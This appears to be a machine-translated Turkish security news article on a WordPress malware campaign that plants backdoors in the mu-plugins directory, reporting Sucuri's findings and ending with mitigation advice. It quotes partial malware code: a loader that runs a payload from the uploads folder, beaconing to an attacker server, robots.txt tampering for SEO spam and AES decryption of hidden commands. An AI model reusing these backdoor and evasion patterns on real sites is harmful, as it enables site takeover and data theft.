Son zamanlarda Sucuri’deki güvenlik araştırmacıları tarafından, WordPress web sitelerini gizli kötü amaçlı yazılım ve Mu-Plugins dizinindeki arka planlar aracılığıyla hedefleyen gelişmiş bir kötü amaçlı yazılım kampanyası ortaya çıktı.
Bu saldırı zinciri, tam sunucu uzlaşması, veri hırsızlığı ve enfekte olmuş siteler üzerinde kalıcı kontrol sağlayan kötü amaçlı kodun uzaktan yürütülmesine izin verir.
. /wp-content/mu-plugins/ Otomatik olarak yüklenen “Mutlaka Kullanılmalı” eklentileri için tasarlanmış dizin, saldırı vektörü oldu. Tehdit aktörleri adlı bir dosya dikti index.php Gizli PHP kodu içeren:
'.$final);
?>Kod çözüldüğünde, bu, yükleri alır ve yürütür /wp-content/uploads/2024/12/index.txt.
Bunun yanı sıra, Sucuri’deki güvenlik analistleri, ikinci aşama yükün gelişmiş özellikler içerdiğini belirtti:-
- Sunucu iletişimi
$xmlname = urldecode('162-er103-1.ivyrebl.fvgr');
$http = is_https() ? 'https' : 'http';
$web = $http.'://'.$goweb.'/index.php?web='.$host.'&zz='.(disbot() ? '1' : '0');Güvenlik araçlarını kontrol ederken saldırgan kontrollü sunucularla iletişimleri maskeler.
- Robots.txt manipülasyonu
$robotsPath = $_SERVER['DOCUMENT_ROOT'].'/robots.txt';
if (!file_exists($robotsPath)) {
file_put_contents($robotsPath, "User-agent: *\nAllow: /\nSitemap: ...");
}Kötü niyetli SEO kampanyalarını artırmak için sahte site haritaları oluşturur.
Gelişmiş kalıcılık mekanizmaları
İkinci bir arka kapı (test-muplugin.php), yük dağıtım için AES-128-CBC şifrelemesi kullanıldı:-
$_7a5b = "l2UDM/1kihg+Pd50dO3hKCkDZKCBzafIvVT20a6iA3JU8Hmvdc+zphRj...";
function zwxyb($_7a5b, $_11f9) {
return openssl_decrypt($_7a5b, 'AES-128-CBC', substr(hash('sha256', $_11f9, true), 0, 16), 0, ...);
}Bu, imza tabanlı algılamadan kaçarken saldırgan komutlarını şifresini çözer.
Yeni keşfedilen bir kötü amaçlı yazılım kampanyası, kimlik bilgisi doldurma ve kimlik avı saldırıları yoluyla WordPress web sitelerinden ödün vererek, şifreli yüklerle Mu-Plugins dizinindeki arka kapı kurulumlarına yol açıyor.
İçeri girdikten sonra, kötü amaçlı yazılım sunucular arasında yanal olarak yayılır, kriptominerler, fidye yazılımı veya veri açığa çıkması gibi tehditler yürütür.
Bu riski azaltmak için, web sitesi sahipleri, yükleme dizinlerinde PHP yürütmeyi engelleyerek, tüm yönetici, FTP ve veritabanı kimlik bilgilerini sıfırla ve Mu-Plugins izleme ile web uygulaması güvenlik duvarlarını uygulamalıdır.
Bu kampanya, kullanılmayan dizinleri devre dışı bırakmak ve gerçek zamanlı kötü amaçlı yazılım taramaları yapmak da dahil olmak üzere sürekli WordPress güvenlik sertleşmesinin önemini göstermektedir, çünkü enfeksiyonların% 68’i eski bileşenlerden kaynaklanmaktadır.
Investigate Real-World Malicious Links & Phishing Attacks With Threat Intelligence Lookup - Try for Free